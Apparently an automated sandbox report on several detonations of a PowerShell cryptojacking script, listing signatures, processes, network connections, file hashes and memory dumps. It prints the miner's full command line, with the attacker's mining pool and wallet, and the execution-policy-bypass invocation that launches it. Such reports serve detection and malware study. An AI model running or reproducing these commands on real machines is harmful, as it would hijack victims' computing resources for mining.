Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3592-0-0x00007FFBE9C73000-0x00007FFBE9C75000-memory.dmp

memory/3592-1-0x0000025EF7AC0000-0x0000025EF7AE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bzqmcfzo.hrf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3592-10-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-11-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-12-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-14-0x0000025EF7FB0000-0x0000025EF7FC2000-memory.dmp

memory/3592-15-0x0000025EF7E80000-0x0000025EF7E8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1920-46-0x00000198CF4F0000-0x00000198CF510000-memory.dmp

memory/1920-47-0x00000198CF540000-0x00000198CF560000-memory.dmp

memory/1920-48-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/3592-50-0x00007FFBE9C73000-0x00007FFBE9C75000-memory.dmp

memory/1920-49-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-53-0x00000198CF580000-0x00000198CF5A0000-memory.dmp

memory/1920-52-0x00000198CF560000-0x00000198CF580000-memory.dmp

memory/3592-51-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-54-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-55-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/1920-56-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-57-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-59-0x00000198CF580000-0x00000198CF5A0000-memory.dmp

memory/1920-58-0x00000198CF560000-0x00000198CF580000-memory.dmp

memory/1920-60-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-61-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-62-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-63-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-64-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-65-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-66-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-67-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-68-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-69-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-70-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-71-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-72-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-73-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-74-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-75-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-76-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-77-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-78-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-79-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-80-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-81-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-82-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-83-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-84-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-85-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-86-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-87-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-88-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-89-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-90-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-91-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-92-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-93-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-94-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-95-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-96-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-97-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-98-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-99-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-100-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-101-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-102-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-103-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-104-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-105-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-106-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-107-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-108-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-109-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-110-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-111-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-112-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-113-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-114-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-115-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-116-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-117-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

memory/1920-118-0x00007FF6B57B0000-0x00007FF6B63E3000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/344-0-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/344-5-0x000001FFC94A0000-0x000001FFC94C2000-memory.dmp

memory/344-6-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/344-9-0x000001FFE1BA0000-0x000001FFE1C16000-memory.dmp

memory/344-10-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crtdyw1o.nsn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/344-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/344-48-0x000001FFE18F0000-0x000001FFE1902000-memory.dmp

memory/344-61-0x000001FFC94E0000-0x000001FFC94EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/348-90-0x000001CB9AD60000-0x000001CB9AD80000-memory.dmp

memory/348-91-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/344-92-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/344-93-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/348-94-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/344-95-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/348-96-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-97-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-98-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-99-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-100-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-101-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-102-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-103-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-104-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-105-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-106-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-107-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-108-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-109-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-110-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-111-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-112-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-113-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-114-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-115-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-116-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-117-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-118-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-119-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-120-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-121-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-122-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-123-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-124-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-125-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-126-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-127-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-128-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-129-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-130-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-131-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-132-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-133-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-134-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-135-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-136-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-137-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-138-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-139-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-140-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-141-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-142-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-143-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-144-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-145-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-146-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-147-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-148-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-149-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-150-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-151-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-152-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-153-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-154-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-155-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

memory/348-156-0x00007FF71C9B0000-0x00007FF71D5E3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:13

Platform

win10v2004-20240611-en

Max time kernel

1795s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 204.79.197.237:443 g.bing.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
GB 184.28.176.114:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 114.176.28.184.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp

Files

memory/4448-0-0x00007FF925D53000-0x00007FF925D55000-memory.dmp

memory/4448-1-0x0000019ECD5D0000-0x0000019ECD5F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_etub3e0t.hcp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4448-11-0x00007FF925D50000-0x00007FF926811000-memory.dmp

memory/4448-12-0x00007FF925D50000-0x00007FF926811000-memory.dmp

memory/4448-13-0x00007FF925D50000-0x00007FF926811000-memory.dmp

memory/4448-14-0x00007FF925D53000-0x00007FF925D55000-memory.dmp

memory/4448-15-0x00007FF925D50000-0x00007FF926811000-memory.dmp

memory/4448-17-0x00007FF925D50000-0x00007FF926811000-memory.dmp

memory/4448-18-0x0000019ECD790000-0x0000019ECD7A2000-memory.dmp

memory/4448-19-0x0000019ECCC90000-0x0000019ECCC9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3612-50-0x00000205DFA40000-0x00000205DFA60000-memory.dmp

memory/3612-51-0x00000205DFA80000-0x00000205DFAA0000-memory.dmp

memory/3612-52-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-53-0x00000205E1380000-0x00000205E13A0000-memory.dmp

memory/3612-54-0x00000205E1360000-0x00000205E1380000-memory.dmp

memory/3612-55-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-56-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/4448-57-0x00007FF925D50000-0x00007FF926811000-memory.dmp

memory/3612-58-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-60-0x00000205E1360000-0x00000205E1380000-memory.dmp

memory/3612-59-0x00000205E1380000-0x00000205E13A0000-memory.dmp

memory/3612-61-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-62-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-63-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-64-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-65-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-66-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-67-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-68-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-69-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-70-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-71-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-72-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-73-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-74-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-75-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-76-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-77-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-78-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-79-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-80-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-81-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-82-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-83-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-84-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-85-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-86-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

memory/3612-87-0x00007FF65B490000-0x00007FF65C0C3000-memory.dmp

